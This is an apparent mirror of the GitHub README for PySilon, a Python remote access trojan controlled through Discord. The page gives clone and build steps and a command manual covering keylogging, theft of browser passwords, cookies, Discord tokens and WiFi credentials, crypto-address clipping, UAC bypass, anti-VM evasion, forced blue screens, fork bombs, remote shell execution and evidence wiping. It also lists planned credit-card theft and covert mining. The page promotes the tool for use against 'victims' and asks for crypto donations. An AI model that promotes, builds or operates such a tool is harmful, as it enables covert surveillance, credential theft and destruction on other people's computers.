mategol/PySilon-malware

GitHub: mategol/PySilon-malware

一个基于 Python、通过 Discord 控制的远程访问木马,提供可视化构建器与丰富命令集。

Stars: 1206 | Forks: 195

# PySilon Malware

`Advanced RAT malware written in Python, fully controllable through Discord with dedicated GUI builder to make preparation easier.` `Dont download or buy from anywhere else except this repository. Especially not from someone claiming they got an advanced/pro version on telegram or discord!`
## Wiki Read our extensive Wiki for more information and detailed building instructions. [![Wiki](https://img.shields.io/badge/wiki-link-blue?style=for-the-badge&logo=gitbook&logoColor=white)](https://github.com/mategol/PySilon-malware/wiki) # 目录 - Disclaimer - Features - Preparation - Available commands - Setup - Building executable - Autonomic features - Commands manual # 免责声明 # 功能 ### PySilon 恶意软件可以执行许多操作,例如: - handle multiple PCs (not only one, like in most of the cases) - UAC Bypass (gain *Administrative permissions* on startup) - **delete itself whenever you want** - log every key pressed on *keyboard* (keylogger) - take *screenshots* anytime you want - record *screen* anytime you want - elevate itself to *critical process* (will trigger *Blue Screen of Death* when killed) - directly *manipulate* **victim's PC graphics** (display custom "things"->[bitmaps, images, texts, glitch effects]) - turn **off**/**on** *monitors* of victim's PC - **block** access to any *website* - browse and kill running *processes* - disable processes (make certain processes **impossible** to run) - *communicate* with the victim in several ways - use *Text-To-Speech* on victim's PC - take images from *webcam* - *block* the *mouse* and *keyboard* - steal saved *WiFi* passwords - grab *history*, *cookies* and *passwords* saved in web browsers - grab *discord tokens* - grab system information - manipulate *Windows sounds* settings (change the *volume*) - play **audio files** on victim's PC (in background) - record *microphone* input (24/7) and save it in *.wav* files - stream live *microphone* input on voice channel - browse *files* on target PC - upload and download *files* from target PC - remove *files* from target PC - execute *files* on target PC - replace copied *crypto currency wallet* addresses to your [configured] ones - trigger *jumpscares* - trigger *Blue Screen of Death* - execute *fork bomb* (crash the PC) - *Anti-VM* (PySilon won't run on Virtual Machines, f.ex.: VirtualBox, VMWare) - run *shell* commands (CMD/Powershell) - ***Debug Mode*** for easier testing and `contribution` # 准备
`git clone https://github.com/mategol/pysilon-malware`
`cd pysilon-malware`
`Create Discord BOT and server`
***Windows:*** `Run the PySilon.bat either from Command Line or double clicking on it`
***Linux:*** `Run the PySilon.sh from Command Line`
# 可用命令 `.ss` - take screenshot at any time
`.screenrec` - record the screen for 15 seconds
`.critical-enable` - elevates the process to critical status (`.critical-disable` to undo)
`.display-graphic` - manipulate low-level graphics by displaying pixels prepared in DrawlingStudio
`.display-glitch ` - display specified screen glitch
`.monitors-off` - turn off all monitors (`.monitors-on` to turn back on)
`.website-block ` - block specified website from being accessed from any browser (`.website-unblock ` to unblock it)
`.show ` - get list of running processes or available commands
`.kill ` - kill any running process
`.blacklist ` - adds specified process to the blacklist (victim won't be able to run it)
`.whitelist ` - removes specified process from the blacklist (victim will be able to run it)
`.foreground` - get active window process name
`.msg title="" text="<text>" style=<style>`</a> - send a message to victim and get the response<br /> <a href="https://github.com/mategol/pysilon-malware#ss"> `.tts <message>`</a> - plays a *Text-to-Speech* message on victim's PC<br /> <a href="https://github.com/mategol/pysilon-malware#ss"> `.webcam <action>`</a> - use connected webcam (currently supports photos shooting)<br /> <a href="https://github.com/mategol/pysilon-malware#block-input">`.block-input`</a> - block the mouse and keyboard(`.unblock-input` to unblock it)<br /> <a href="https://github.com/mategol/pysilon-malware#grab-what-to-grab"> `.grab <what-to-grab>`</a> - grab for example saved passwords in web browsers<br /> <a href="https://github.com/mategol/pysilon-malware#ss"> `.volume <value>`</a> - change the audio output volume on victim's PC<br /> <a href="https://github.com/mategol/pysilon-malware#ss"> `.play [<file>]`</a> - play any *.mp3* file on the victim's PC (existing one or sent in the next message if no filename was provided)<br /> <a href="https://github.com/mategol/pysilon-malware#join"> `.join`</a> - join voice-channel and stream live microphone input<br /> <a href="https://github.com/mategol/pysilon-malware#pwd"> `.pwd`</a> - show working directory<br /> <a href="https://github.com/mategol/pysilon-malware#ls"> `.ls`</a> - list content of working directory<br /> <a href="https://github.com/mategol/pysilon-malware#tree"> `.tree`</a> - show tree of working directory<br /> <a href="https://github.com/mategol/pysilon-malware#cd-directory"> `.cd <directory>`</a> - change working directory<br /> <a href="https://github.com/mategol/pysilon-malware#upload-type-filename"> `.upload <type> [<name>]`</a> - upload any file or zipped directory (also greater than 8MB ones) onto target PC<br /> <a href="https://github.com/mategol/pysilon-malware#download-file-or-directory"> `.download <file-or-directory>`</a> - download any file or zipped directory (also greater than 8MB ones) from target PC<br /> <a href="https://github.com/mategol/pysilon-malware#remove-file-or-dir"> `.remove <file-or-directory>`</a> - remove file or directory on target PC<br /> <a href="https://github.com/mategol/pysilon-malware#execute-file"> `.execute <file>`</a> - run any file on target PC<br /> <a href="https://github.com/mategol/pysilon-malware#ss"> `.start-clipper`</a> - start crypto-clipper (swap crypto currency wallet addresses to your ones)(`.stop-clipper` to stop it)<br /> <a href="https://github.com/mategol/pysilon-malware#ss"> `.jumpscare [<preset>]`</a> - play very loud and rapidly flashing video or other graphics<br /> <a href="https://github.com/mategol/pysilon-malware#ss"> `.bsod`</a> - trigger Blue Screen of Death<br /> <a href="https://github.com/mategol/pysilon-malware#ss"> `.forkbomb`</a> - execute fork bomb<br /> <a href="https://github.com/mategol/pysilon-malware#ss"> `.cmd <command>`</a> - execute shell command on victim's PC and send back the output<br /> <a href="https://github.com/mategol/pysilon-malware#implode"> `.implode`</a> - remove PySilon from target PC and clean the "evidence"<br /> <a href="https://github.com/mategol/PySilon-malware#clear"> `.clear`</a> - clear messages from file-related channel<br /> XMR: 4BGaWuNg1io79eHeM67HdEdWgucd6QGfnZACfoRh4eWQYXbGeJGAyxZ4gb15SssDQff4WShpcB3KaAXkyJZr3eQR719bfpp BTC: bc1qw6vp2pj74gthgftyh88rly03pjyuemcavsg9fp ETH: 0x8DBF8b713542b6AA96981Ce6Ab8a19eDf502356c LTC: LZP9Wbuwb4XgeJ8cQPpaWAkpAfWeXq363V ### 待办事项 List of features that should appear in following releases: - [ ] webhook connection in case of unexpected circumstances (like BOT-Token banned by Discord) - [ ] overall system info grabber with cool Discord Embeds - [ ] traditional reverse shell creator - [ ] grab credit cards information - [ ] optional crypto mining (for example, when victim is idle) - [ ] grab sessions from popular applications (Steam/Minecraft/Metamask/Exodus/Roblox)</div><div><strong>标签:</strong>APT, Discord, GUI生成器, OS命令执行, Python, RAT, SSH蜜罐, UAC绕过, 云资产清单, 代码生成, 关键进程, 反取证, 图形界面构建, 安全评估, 屏幕录制, 屏幕截图, 恶意软件, 提权, 攻击框架, 无后门, 渗透测试工具, 独立可执行文件, 自删除, 蓝屏, 进程注入, 远程访问木马, 逆向工具, 逆向工程, 键盘记录</div></article></div> <!-- 人机验证 --> <script> (function () { var base = (document.querySelector('base') && document.querySelector('base').getAttribute('href')) || ''; var path = base.replace(/\/?$/, '') + '/cap-wasm/cap_wasm.min.js'; window.CAP_CUSTOM_WASM_URL = new URL(path, window.location.href).href; })(); </script> </body> </html>